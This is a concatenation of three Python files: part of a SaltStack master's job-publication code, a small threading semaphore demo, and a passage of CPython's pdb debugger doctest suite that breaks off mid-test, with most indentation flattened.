if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
|
semaphore.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import threading
def run():
semaphore.acquire()
print(f'{threading.current_thread().name} is running at {time.ctime()}.')
time.sleep(1)
semaphore.release()
semaphore = threading.BoundedSemaphore(2)
for i in range(6):
threading.Thread(target=run).start()
print(f'Active count: {threading.active_count()-1}')  # all threads remain active after starting
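# A variant of the same demo (assumed equivalent behaviour): use the semaphore
# as a context manager so acquire/release are always paired, and join the
# threads so the script exits only after all workers finish.
import threading
import time

semaphore = threading.BoundedSemaphore(2)  # at most two workers run at once

def run():
    with semaphore:
        print(f'{threading.current_thread().name} is running at {time.ctime()}.')
        time.sleep(1)

threads = [threading.Thread(target=run) for _ in range(6)]
for t in threads:
    t.start()
for t in threads:
    t.join()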
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
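# PdbTestInput replays canned commands by swapping sys.stdin for a fake input;
# outside of doctests a minimal (illustrative) use would look like:
#
#   with PdbTestInput(['next', 'continue']):
#       function_that_calls_set_trace()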
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[3]>(21)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[2]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoing is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
